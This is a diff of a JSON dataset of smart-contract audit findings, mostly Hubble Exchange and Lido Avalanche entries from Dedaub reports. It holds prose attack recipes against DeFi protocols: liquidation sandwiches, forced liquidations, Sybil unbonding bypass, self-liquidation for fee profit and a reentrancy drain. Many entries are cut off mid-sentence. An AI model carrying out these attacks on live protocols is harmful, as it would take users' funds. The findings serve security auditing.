delete essential data DISMISSED Oracle::setNodeIDList deletes reportsByEpochId[latestEpochId], i.e., the latest epoch data, as they might no longer be valid due to validators being removed from the list. The latest epoch data is supplied to the Oracle contract via the OracleManager, which calls the function Oracle::receiveFinalizedReport and marks that the report for that epoch has been nalized, meaning that it cannot be resubmied. This information, which might irreversibly get deleted by the Oracle::setNodeIDList, is essential for the ValidatorSelector contract to proceed with the validator selection process. Thus, care should be taken to ensure that Oracle::setNodeIDList isnt called after OracleManager::receiveMemberReport and before ValidatorSelector::getAvailableValidatorsWithCapacity, as such a sequence of calls would leave the system in an invalid state.", + "title": "Liquidations of Maker ", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": " DISMISSED The crypto-economic design of this protocol can lead to force-liquidation of Makers through very small price movements. The following design elements make it easy to force liquidate makers: - Curve-Crypto AMM can yield the same price with dierent pool compositions - Spread limit is hard to trigger with single transactions Scenario: Bob wants to force liquidate Alices maker position to perform a liquidation slippage sandwich. [Note: the following gures are approximate] 1. With a small amount of margin, Alice opens a maker position: $3000 + 0.5ETH, when ETH is at $2000. Note that the pool is not perfectly balanced. 2. Bob opens a large short position, say 10ETH, moving ETH price to $1900. 3. The pools composition changed signicantly with one swap, but not the price. 4. 
Alice's position is now around $1100 + 1.5ETH, so openNotional = 1900 and position = 1 5. Alice's maker debt is $6000 6. Alice's notionalPosition is $7900 The result is that with < 5% price change, Alice's margin fraction has decreased by 25%", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "may revert due to array out-of-bounds error in ValidatorSelector::getAvailableValidatorsWithCapacity RESOLVED Function ValidatorSelector::getAvailableValidatorsWithCapacity retrieves the latest epoch validators from the Oracle in the validators array, computes how many of those satisfy the filtering criteria and then creates an array of that size, result, and traverses again the validators array to populate it. function getAvailableValidatorsWithCapacity(uint256 amount) public view returns (Validator[] memory) { Validator[] memory validators = oracle.getLatestValidators(); uint256 count = 0; for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) count++; } Validator[] memory result = new Validator[](count); for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) // Dedaub: index can get bigger than result.length. // Dedaub: a count variable needs to be used as in the above loop. result[index] = validators[index]; } return result; } However, there is a bug in the implementation that can cause an array out-of-bounds exception at line result[index] = validators[index]. Variable index is in the range [0, validators.length-1], while result.length will be strictly less than validators.length if at least one validator has been filtered out of the initial validators array, thus index might be greater than result.length-1. Consider the scenario where validators = [1, 2] and count (or result.length) is 1 as the validator with id 1 has been filtered out. Then the second loop will traverse the whole validators array and will try to assign the validator with id 2 (array index 1) to result[1] causing an out-of-bounds exception, as result has a length of 1 (can only be assigned to index 0). Using a count variable, similarly to the first loop, would be enough to solve this issue.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "process is easily circumvented DISMISSED The unbonding process can be easily circumvented through a variation on the Sybil attack. Unbonding liquidity at will enables other attacks such as liquidity frontrunning. Scenario: Alice wants to add an amount of liquidity and be able to withdraw a fraction (1/M) of it on any one day. We assume that the withdrawal period is N days and the unbonding period is M days. This means that using the following strategy, Alice can always remove 1/M of her liquidity, like so: 1. Alice deposits 1/M of the amount each day for M days on M different addresses 2. After M days, Alice goes through each address where the withdrawal expired and requests unbonding again. 3. 
On any day after the first M days, Alice can withdraw up to 1/M of her liquidity.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "due to the ability of a group to confirm any public key RESOLVED A DoS attack could be possible due to the ability of a group to perform confirmations for any given public key. More specifically, we think that a group with adversarial members can front-run the reportGeneratedKey() using a public key which was requested by another group, via requestKeygen(). By doing so, this public key will be confirmed by and assigned to the adversary group. // MpcManager.sol::reportGeneratedKey:214 if (_generatedKeyConfirmedByAll(groupId, generatedPublicKey)) { info.groupId = groupId; info.confirmed = true; ... } This will DoS the system for the benevolent group, which will not be able to perform any further confirmations for this public key. // MpcManager.sol::reportGeneratedKey:208 if (info.confirmed) revert AttemptToReconfirmKey(); The adversary group can then proceed with joining the staking request, changing the threshold needed for starting the request (of course in the case where the adversary group has a smaller threshold than the original one). // MpcManager.sol::joinRequest:238 uint256 threshold = _groupThreshold[info.groupId]; However, they don't have to join the request and can leave it pending. Since multiple public keys can be requested for the same group, they can proceed with different keys and different stake requests if they wish to interact with the contracts benevolently for their own benefit. The MpcManager.sol contract has quite a bit of off-chain logic, but we believe that it is valid as an adversary model to assume that groups cannot be entirely trusted and that they can act adversely against other benevolent groups. In the opposite scenario, considering all groups as trusted could lead to centralization issues, even though only the MPC manager can create the groups.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "amount is not reset on liquidation RESOLVED A maker's liquidation calls method AMM::forceRemoveLiquidity, which in turn calls AMM::_removeLiquidity and operates in the same manner as the regular removeLiquidity thereafter, but does not reset a pending unbonding amount that the maker might have. The function AMM::removeLiquidity, on the other hand, deducts the unbonding amount accordingly: Maker storage _maker = _makers[maker]; _maker.unbondAmount -= amount;", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "can be called by a member of any group with any generated public key RESOLVED MpcManager::reportUTXO() does not contain any checks to ensure that the member which calls it is a member of the group that reported and confirmed the provided genPubKey. This means that a member of any group can call this function with any of the generated public keys even if the latter has been confirmed by and assigned to another group. By doing so, a group can run reportUTXO(), changing the threshold needed for the report to be exported. 
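If this is unintended, a possible restriction is sketched below (assuming the group of a confirmed key is recorded in its key info and that group membership can be checked; these names are assumptions): require(_isGroupMember(_keyInfo[genPubKey].groupId, msg.sender), \"caller not in key's group\"); 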
It is not clear from the specification if allowing any member to call this function with any public key is the desired behaviour or if further checks, along these lines, should be applied.", + "body": "Liquidations ACKNOWLEDGED The risk of cascading liquidations in Hubble is relatively high, especially where maker liquidations are concerned. Takers are relatively protected from triggering liquidations of other takers due to the dual mode margin fraction mechanism (which uses oracle prices in cases of large divergences between mark and index prices). However, a taker liquidation can trigger a maker liquidation (see M1). In turn, the removal of maker liquidity makes the price derived via Swap::get_dy and Swap::get_dx lower. The following are our inferred cascading liquidation risks: - Taker liquidation triggering a taker liquidation (low) - Maker liquidation triggering a taker liquidation (medium, effect of swap price movement in addition to the effect of removal of liquidity) - Maker liquidation triggering a maker liquidation (high, see M1) - Taker liquidation triggering a maker liquidation (high, see M1)", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { - "title": "number of remaining TODO items suggest certain functionality is not implemented RESOLVED There are a number of TODO items that spread across the entire codebase and test suite. Most of these TODOs are trivial and the test suite appears to be well developed. However, there is a small number of TODOs that concern checks and invariants and also unimplemented functionality like supporting more types of validator requests. This could mean that further development is needed, which could render the current security assessment partially insufficient. LOW SEVERITY: ID Description ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "stakers who double as liquidators can increase their share of the pool RESOLVED [This issue was partially known to the developers] If an insurance staker also doubles as a liquidator, then they can: 1. Withdraw their insurance contribution 2. Liquidate bad debt 3. Settle bad debt using other users' insurance stake 4. Re-deposit their stake again The liquidator/staker now owns a larger portion of the pool. This effect can be compounded. Opening multiple tiny positions to make liquidations", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "claim of AVAX might result in rounding errors RESOLVED According to a note in the AvaLido::claim function, the protocol allows partial claims of unstake requests so that users don't need to wait for the entire request to be filled to get some liquidity. This is one of the reasons the exchange rate stAVAX:AVAX is set in function requestWithdrawal instead of in claim. 
The partial claim logic is implemented mainly in the following line: uint256 amountOfStAVAXToBurn = Math.mulDiv(request.stAVAXLocked, amount, request.amountRequested); The amount of stAVAX that is traded back, request.stAVAXLocked, is multiplied by the amount of AVAX claimed, amount, and the result is divided by the whole AVAX amount corresponding to the request, request.amountRequested, to give us the corresponding amount of stAVAX that should be burned. This computation might suffer from rounding errors depending on the amount parameter, leading to a small amount of stAVAX not being burned. We believe that these amounts would be too small to really affect the exchange rate of stAVAX:AVAX, still it would make sense to verify this or get rid of the rounding error altogether.", + "body": "unprofitable There are no restrictions on the minimum size of the position a user can open and on the minimum amount of collateral he should deposit when an account is opened. A really small position will be unprofitable for an arbitrageur to liquidate. An adversary could take advantage of this fact and open a huge number of tiny positions, using different accounts. The adversary might not be able to get a direct profit from such an approach, but since these positions are going to stay open for a long time, as no one will profit by liquidating them, they can significantly shift the price of the vAMM with small risk. To safeguard against such attacks we suggest that a lower bound on the position size and collateral should be used. Liquidating own tiny maker position to profit from the fixed", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Low" + "Hubble Exchange", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "might fail due to uninitialized variable RESOLVED Function Treasury::claim could be called while the avaLidoAddress storage variable might not have been set via the setAvaLidoAddress, leading to the transaction reverting due to msg.sender not being equal to address(0). This outcome can of course be considered desirable, but at the same time, the needed call to setAvaLidoAddress adds unnecessary complexity. Currently, the setAvaLidoAddress function works practically as an initializer, as it cannot set the avaLidoAddress storage variable more than once. If that is the intent, avaLidoAddress could be set in the initialize function, which would reduce the chances of claim and consequently of AvaLido::claimUnstakedPrincipals and AvaLido::claimRewards calls reverting. L3 AvaLido::deposit check considers deposited amount twice RESOLVED The function AvaLido::deposit implements the following check: if (protocolControlledAVAX() + amount > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); However, the check should be changed to: if (protocolControlledAVAX() > maxProtocolControlledAVAX) revert ProtocolStakedAmountTooLarge(); as the function protocolControlledAVAX() uses address(this).balance, meaning that amount, which is equal to the msg.value, has already been taken into account once and if added to the value returned by protocolControlledAVAX(), it would be counted twice. Nevertheless, we expect that neither condition would ever be satisfied as maxProtocolControlledAVAX is by default set to type(uint256).max. 
Still, we would advise addressing the issue just in case maxProtocolControlledAVAX is changed in the future. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) The protocol defines several admin/manager roles that serve to give access to specific functions of certain contracts only to the appropriate entities. The following roles are defined and used: DEFAULT_ADMIN_ROLE ROLE_PAUSE_MANAGER ROLE_FEE_MANAGER ROLE_ORACLE_ADMIN ROLE_VALIDATOR_MANAGER ROLE_MPC_MANAGER ROLE_TREASURY_MANAGER ROLE_PROTOCOL_MANAGER For example, the entity that is assigned the ROLE_MPC_MANAGER is able to call functions MpcManager::createGroup and MpcManager::requestKeygen that are essential for the correct functioning of the MPC component. Multiple roles allow for the distribution of power so that if one entity gets hacked all other functions of the protocol remain unaffected. Of course, this assumes that the protocol team distributes the different roles to separate entities thoughtfully and does not completely alleviate centralization issues. The contract MpcManager.sol appears to build on/depend on a lot of off-chain logic that could make it suffer from centralization issues as well. A possible attack scenario is described in issue M3 above that raises the question of credibility for the MPC groups even though they can only be created by the MPC manager. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", - "labels": [ + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "fee As discussed in issue M6, one can open however small a position they want. The same is true when providing liquidity. On the other hand, the incentive fee for liquidating a maker, i.e., someone that provides liquidity, is fixed, and it is 20 dollars, as defined in ClearingHouse::fixedMakerLiquidationFee. Thus, one could provide really tiny amounts of liquidity (with tiny amounts of collateral backing it) and liquidate themselves with another account to make a profit from the liquidation fee. Networks with small transaction fees (e.g., Avalanche) or", + "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Low" + "Hubble Exchange", + "Severity: Medium" ] }, { - "title": "array of public keys provided to MpcManager::createGroup needs to be sorted ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": " RESOLVED The array of public keys provided to MpcManager::createGroup by the MPC manager needs to be sorted, otherwise the groupId produced by the keccak256 of the array might be different for the same sets of public keys. 
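To illustrate the sortedness requirement discussed in this finding, here is a minimal sketch of our own (the contract and the ordering rule are illustrative assumptions, not the audited MpcManager code): a keccak256-derived group id is order-sensitive, and while sorting on-chain is costly, verifying a canonical order is a cheap O(n) check.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical sketch, not the audited MpcManager code. keccak256 over an
// encoded array is order-sensitive, so the same set of keys in a different
// order yields a different group id unless the caller pre-sorts the array.
contract GroupIdSketch {
    function groupIdOf(bytes[] calldata pubKeys) external pure returns (bytes32) {
        for (uint256 i = 1; i < pubKeys.length; i++) {
            // Cheap O(n) canonical-order check (ordering by key hash is one
            // possible convention); reverts on unsorted or duplicate input.
            require(
                keccak256(pubKeys[i - 1]) < keccak256(pubKeys[i]),
                "pubKeys must be sorted and distinct"
            );
        }
        return keccak256(abi.encode(pubKeys));
    }
}
```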
As sorting is tricky to perform on-chain and has not been implemented in this instance, the contract's API or documentation should make it clear that the array provided needs to be already sorted.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "could make such an attack really profitable, especially if executed on a large scale. ClearingHouse::isMaker does not take into account makers'", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "in AvaLido::fillUnstakeRequests is always true RESOLVED The following check in AvaLido::fillUnstakeRequests is expected to be always true, since the isFilled check right before guarantees that the request is not filled. if (isFilled(unstakeRequests[i])) { // This shouldn't happen, but revert if it does for clearer testing revert(\"Invalid state - filled request in queue\"); } // Dedaub: the following is expected to be always true if (unstakeRequests[i].amountFilled < unstakeRequests[i].amountRequested) { ... }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "ignition share Method ClearingHouse::isMaker checks if a user is a maker by implementing the following check: function isMaker(address trader) override public view returns(bool) { uint numAmms = amms.length; for (uint i; i < numAmms; ++i) { IAMM.Maker memory maker = amms[i].makers(trader); if (maker.dToken > 0) { return true; } } return false; } However, the AMM could still be in the ignition phase, meaning that the maker could have provided liquidity that is reflected in maker.ignition but is not yet reflected in maker.dToken. This omission could allow liquidation of a user's taker positions before their maker positions, which is something undesirable, as defined by the liquidate and liquidateTaker methods of ClearingHouse.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "responsible for setting/updating numeric protocol parameters could define bounds on these values INFO Functions like AvaLido::setStakePeriod and AvaLido::setMinStakeAmount could set lower and/or upper bounds for the accepted values. Such a change might require more initial thought but could protect against accidental mistakes when setting these parameters.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "Slippage Sandwich Attack ACKNOWLEDGED [The attack is related to already known issues, but is documented in more detail here] 1. Alice has a long position that is underwater 2. Bob opens a large short position 3. Bob liquidates Alice. This triggers a swap in the same direction as Bob's position and causes slippage. 4. Bob closes his position, and profits on the slippage at the expense of Alice. M10 Self close bad debt attack DISMISSED This is a non-specific attack on the economics of the protocol. 1. Alice opens a short position using account A 2. Alice opens a large long position using account B 3. In the meantime, the market moves up. 4. Alice closes her under-collateralized position A. Bad debt occurs. 5. 
Alice can now close position B and realize her profit LOW SEVERITY: ", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "might revert with ClaimTooLarge error INFO The function AvaLido::claim checks that the amount requested, amount, is not greater than request.amountFilled - request.amountClaimed. The user experience could be improved if in such cases, instead of reverting, the claimed amount was set to request.amountFilled - request.amountClaimed, i.e., the maximum amount that can be claimed at the moment. Such a change would require the claim function to return the claimed amount.", + "title": "neutra ", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": " ACKNOWLEDGED Maker debt, calculated as the vUSD amount * 2 when the liquidity was added, never changes. If the maker has gained out of her impermanent position, e.g., through fees, this is not accounted for, in certain kinds of liquidations (via oracle). However, if the maker now removes their liquidity, closes their impermanent position and adds the same amount of liquidity, the debt is reset to a different amount.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "storage variables RESOLVED There are a few storage variables that are not used: ValidatorSelector::minimumRequiredStakeTimeRemaining AvaLido::mpcManagerAddress", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "blacklisting checks are incomplete RESOLVED The ClearingHouse contract can set and use a Blacklist contract to ban certain users from opening new positions. However, these same users are not blacklisted from providing liquidity to the protocol, i.e., having impermanent positions, which can be turned into permanent ones when the liquidity is removed. Although this form of opening positions is not controllable, it would be better if blacklisted users were also banned from providing liquidity.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "UnstakeRequest struct field RESOLVED Field requestedAt of struct UnstakeRequest is not used.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "could potentially be reentered RESOLVED VUSD::processWithdrawals of the VUSD contract calls method safeTransfer on the reserveToken defined in VUSD. 
function processWithdrawals() external whenNotPaused { uint reserve = reserveToken.balanceOf(address(this)); require(reserve >= withdrawals[start].amount, 'Cannot process withdrawals at this time: Not enough balance'); uint i = start; while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) { Withdrawal memory withdrawal = withdrawals[i]; if (reserve < withdrawal.amount) { break; } reserve -= withdrawal.amount; reserveToken.safeTransfer(withdrawal.usr, withdrawal.amount); i += 1; } start = i; } In the unlikely scenario that the safeTransfer method (or a method safeTransfer calls internally) of reserveToken allows calling an arbitrary contract, then that contract can reenter the processWithdrawals method. As the start storage variable will not have been updated (it is updated at the very end of the method), the same withdrawal will be executed twice if the contract's reserveToken balance is sufficient. Actually, if reentrancy is possible, the whole balance of the contract can be drained by reentering multiple times. It is easier to perform this attack if the attacker's withdrawal is the first to be executed, which is actually not hard to achieve. This vulnerability is highly unlikely, as it requires the execution reaching an untrusted contract, still we suggest adding a reentrancy guard (minor overhead) to completely remove the possibility of such a scenario. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "can be made external RESOLVED OracleManager::getWhitelistedOracles can be defined as external instead of public, as it is not called from any code inside the OracleManager contract.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "usage increases quadratically with positions ACKNOWLEDGED Whenever a user's position is modified, maintained or liquidated, all of the user's token positions need to be queried (both maker and taker). For instance, this happens in ClearingHouse::getTotalNotionalPositionAndUnrealizedPnl for (uint i; i < numAmms; ++i) { if (amms[i].isOverSpreadLimit()) { (_notionalPosition, _unrealizedPnl) = amms[i].getOracleBasedPnl(trader, margin, mode); } else { (_notionalPosition, _unrealizedPnl,,) = amms[i].getNotionalPositionAndUnrealizedPnl(trader); } notionalPosition += _notionalPosition; unrealizedPnl += _unrealizedPnl; } Therefore, if we assume that a user with more positions and exposure to more tokens needs to tweak their positions from time to time, and the number of actions correlates with the number of positions, the gas usage really scales quadratically with the number of positions for such a user.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "optimization RESOLVED In function AvaLido::claimUnstakedPrincipals there is a conditional check that if true leads to the transaction reverting with InvalidStakeAmount(). 
function claimUnstakedPrincipals() external { uint256 val = address(pricipalTreasury).balance; if (val == 0) return; pricipalTreasury.claim(val); // Dedaub: the next line can be moved before the claim if (amountStakedAVAX == 0 || amountStakedAVAX < val) revert InvalidStakeAmount(); // (rest of the function's logic) } This check could be moved before the principalTreasury.claim(val) as it is not affected by the call. This would lead to gas savings in cases where the transaction reverts, as the unnecessary call to treasury would be skipped.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "regarding the numerical methods of CurveMath.vy ACKNOWLEDGED [Below we use the notation of the curve crypto whitepaper] The CurveCrypto invariant in the case of pools with only two assets (N=2) can be simplified into a low degree polynomial, which could lead to a faster convergence of the numerical methods. The coefficient K, when N=2 (we denote by x and y the deposits of the two assets in the pool), is given by the formula in the whitepaper. If we multiply both sides of the equation by the denominator of K, we get an equivalent equation which is polynomial in all three variables x, y and D. As you can see, it is a cubic equation for x and y, and you can use the formulas for cubic equations either to compute the solution faster or to get a better initial value for the iterative method you are currently using. We believe it would be worth spending some time experimenting with the numerical methods to get the fastest possible convergence (and consequently reduced gas fees paid by the users).", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "contradicts with ValidatorSelector::minimumRequiredStakeTimeRemaining RESOLVED Even though ValidatorSelector::minimumRequiredStakeTimeRemaining is not used, it is defined as 15 days, while AvaLido::stakePeriod is defined as 14 days.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "functionality to remove AMMs ACKNOWLEDGED Governance has the ability to whitelist AMMs via the ClearingHouse::whitelistAmm method, while there is no functionality to remove or blacklist an AMM.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "spelt function name RESOLVED Function name hasAcceptibleUptime of the Types.sol contract should be corrected to hasAcceptableUptime. A11 Compiler bugs INFO The code is compiled with Solidity 0.8.10, which, at the time of writing, has some known bugs, which we do not believe to affect the correctness of the contracts.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "collateral index checks are missing ACKNOWLEDGED There are several external methods of MarginAccount, namely addMargin, addMarginFor, removeMargin, liquidateExactRepay and liquidateExactSeize, that do not implement a check on the collateral index supplied, which can lead to the ungraceful termination of the transaction if an incorrect index has been supplied. 
A simple check such as: require(idx < supportedCollateral.length, \"Collateral not supported\"); could be used to also inform the user of the problem with their transaction.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { - "title": "code ", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": " RESOLVED In UniswapLib.sol, the struct Slot0 definition is not being used. It is recommended that it be removed as it is dead code.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "event is missing timestamp field ACKNOWLEDGED The AMM::PositionChanged event is potentially missing a timestamp field that all other related events (LiquidityAdded, LiquidityRemoved, Unbonded) incorporate.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "simplification RESOLVED In UniswapConfig.sol, all getTokenConfigBy* functions have a check that the index is not type(uint).max, however this is redundant as getTokenConfig already covers this case by checking that index < numTokens. For example: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); // Dedaub: Redundant check; getTokenConfig checks that index < numTokens. That check covers the case where index == type(uint).max // if (index != type(uint).max) { return getTokenConfig(index); } revert(\"token config not found\"); } Can be simplified to: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); return getTokenConfig(index); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "out code ACKNOWLEDGED In method MarginAccount::isLiquidatable the following line is commented out: _isLiquidatable = IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE; This is because IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE is equal to 0, which will be the default value of _isLiquidatable if no value is assigned to it, thus the above assignment is not necessary. Nevertheless, explicitly assigning the enum value makes the code much more readable and intuitive.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "trailing modifier parentheses DISMISSED There are a couple of instances where even zero-argument modifiers are used with parentheses, even though they can be omitted. For example, in UniswapAnchoredView::activateFailover: function activateFailover(bytes32 symbolHash) external onlyOwner() { ... } This pattern can be found in: UniswapAnchoredView::activateFailover UniswapAnchoredView::deactivateFailover Ownable::transferOwnership", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "constants ACKNOWLEDGED There are several magic constants throughout the codebase, many of them related to the precision of token amounts, making it difficult to reason about the correctness of certain computations. 
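As an aside on the magic-constants point, the usual remedy is to name each precision factor once and route conversions through small helpers. The sketch below is purely illustrative; the names and values are our assumptions, not constants from the Hubble codebase:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

// Illustrative only; these names and values are assumptions for the sketch,
// not the audited code's actual precision scheme.
library Precision {
    uint256 internal constant WAD = 1e18;        // 18-decimal amounts
    uint256 internal constant USDC_UNIT = 1e6;   // 6-decimal collateral
    uint256 internal constant ORACLE_UNIT = 1e8; // 8-decimal USD price feeds

    // Instead of a bare `amount * 1e18 / 1e6` scattered through the code:
    function usdcToWad(uint256 amount) internal pure returns (uint256) {
        return amount * WAD / USDC_UNIT;
    }
}
```

Named constants make each conversion's intent auditable at the call site, which is exactly the reasoning difficulty the finding describes.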
The developers of the protocol are aware of the issue and claim that they have developed extensive tests to make sure nothing is wrong in this regard.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "sanity check for fixed price assets RESOLVED In the UniswapAnchoredView constructor, fixed price assets (either ETH or USD pegged) check that the provided uniswap market is zero, however the reporter field is unchecked. It is recommended that the reporter be also required to be zero, for consistency: else { require(uniswapMarket == address(0), \"only reported prices utilize an anchor\"); // Dedaub: Check that reporter is also 0 require(config.reporter == address(0), \"only reported prices utilize a reporter\"); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "price decimals assumption ACKNOWLEDGED The Oracle contract code makes the assumption that the price value returned by the ChainLink oracle has 8 decimals. This assumption appears to be correct if the oracles used report the price in terms of USD. Nevertheless, using the oracle's available decimals method and avoiding such a generic assumption would make the code much more robust.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "functionality is cryptic (fetchAnchorPrice) RESOLVED The correctness of the calculation in UniswapAnchoredView::fetchAnchorPrice is very hard to establish. More comments would help. Specifically, the code reads function fetchAnchorPrice(TokenConfig memory config, uint conversionFactor) internal virtual view returns (uint) { uint256 twap = getUniswapTwap(config); uint rawUniswapPriceMantissa = twap; uint unscaledPriceMantissa = rawUniswapPriceMantissa * conversionFactor; uint anchorPrice = unscaledPriceMantissa * config.baseUnit / ethBaseUnit / expScale; return anchorPrice; } The correctness of this calculation depends on the following understanding, which should be documented in code comments, or the functionality is entirely cryptic. (We note that the original UAV code had similar comments, although the ones below are our own.) getUniswapTwap returns the price between the baseUnits of the two tokens in a pair, scaled to e18 rawUniswapPriceMantissa * config.baseUnit : price of 1 token (instead of one baseUnit of token), relative to baseUnit of the other token. 
